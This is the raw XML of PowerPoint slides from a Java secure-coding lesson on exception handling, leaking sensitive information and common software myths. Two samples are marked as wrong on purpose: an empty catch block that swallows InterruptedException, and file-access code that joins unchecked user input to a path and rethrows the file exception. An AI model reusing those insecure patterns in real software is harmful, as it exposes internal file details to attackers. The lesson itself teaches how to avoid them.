              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demonstrate how to double check checked exceptions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demonstrate to catch and handle exceptions and unexpected behaviors for sensitive information.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1203977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Exception</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prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Programmers often suppress checked exceptions by catching exceptions with an empty or trivial catch block. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Each catch block must ensure that the program continues only with valid invariants.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The catch block must either recover from the exceptional condition, rethrow the exception to allow the next nearest enclosing catch clause of a try statement to recover, or throw an exception that is appropriate to the context of the catch block.</a:t>
            </a:r>
            <a:endParaRPr sz="2000" baseline="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256188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277443"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>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Exception: What’s The Risk?</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xfrm>
            <a:off x="628649" y="1477746"/>
            <a:ext cx="8039361" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Exceptions disrupt the expected control flow of the application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>For example, no part of any expression or statement that occurs in the try block after the point from which the exception is thrown is evaluated. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Exceptions must be handled appropriately. Many reasons for suppressing exceptions are invalid. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>For example, when the client cannot be expected to recover from the underlying problem, it is good practice to allow the exception to propagate outwards rather than to catch and suppress the exception.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2594086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Exception: Example</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xfrm>
            <a:off x="628650" y="1690689"/>
            <a:ext cx="7886700" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr sz="2200" dirty="0"/>
              <a:t>Here is an example of a code that does not take this into consideration:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>class Main implements Runnable {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>  public void run() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>    try {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>Thread.sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>(1000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>    } catch (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>InterruptedException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t> e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>      // Ignore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>    }  } }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3087039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Exception: Example</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xfrm>
            <a:off x="628650" y="1474896"/>
            <a:ext cx="7886700" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr sz="2000" dirty="0"/>
              <a:t>Here is a code block th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0"/>
              <a:t>t was written securely:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>class Main implements Runnable {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>  public void run() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>    try {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>Thread.sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>(1000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>    } catch (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>InterruptedException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>Thread.currentThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>().interrupt(); // Reset interrupted status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Catches the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>InterruptedException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> and restores the interrupted status by calling the interrupt() method on the current thread.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1324525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Sensitive Information</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prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Both the exception message text and the type of an exception can leak information. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>For example, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>FileNotFoundException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> message reveals information about the file system layout, and the exception type reveals the absence of the requested file.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117208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lgn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sensitive Information: What’s The Risk?</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prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Failure to filter sensitive information when propagating exceptions often results in information leaks that can assist an attacker's efforts to develop further exploits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>An attacker may craft input arguments to expose internal structures and mechanisms of the application.</a:t>
            </a:r>
            <a:endParaRPr sz="2000" baseline="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2574079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US" sz="3300" b="1" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sensitive Information: Example</a:t>
            </a:r>
            <a:endParaRPr sz="3300" b="1" dirty="0">
              <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825625"/>
            <a:ext cx="7886700" cy="3623197"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr sz="2000" dirty="0"/>
              <a:t>Here is an example of a code that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>leaks the sensitive information</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>try {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>FileInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>fis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>      new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>FileInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>System.getenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>("APPDATA") + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>[0]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>} catch (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>FileNotFoundException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>     // Log the exception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>     throw new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>IOException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>("Unable to retrieve file", e);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402471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en-US"/>
              <a:t>Ten Software Myths</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159747" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="746125" y="1487488"/>
            <a:ext cx="7559675"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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" indent="-457200">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="-457200">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" indent="-457200">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" indent="-457200">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" indent="-457200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" indent="-457200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" indent="-457200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" indent="-457200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Our company has a secure network, a firewall and virus protection, so our software applications are secure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Software requirements should be driven by advancements in technology.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Security, reliability and safety can be tested into software after its development.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310228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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478338" y="708447"/>
            <a:ext cx="7886700" cy="5310309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr sz="2200" dirty="0"/>
              <a:t>Here is a code block th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0"/>
              <a:t>t was written securely:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="871538" y="1362075"/>
            <a:ext cx="6457950" cy="4762370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30429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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ten Software Myths </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>(continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97283" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="1447800"/>
            <a:ext cx="7162800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
              <a:tabLst>
                <a:tab pos="1485900" algn="l"/>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Following good software development processes and standards guarantees good software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
              <a:tabLst>
                <a:tab pos="1485900" algn="l"/>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>If the software we purchase fails, we can hold the manufacturer responsible for damages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
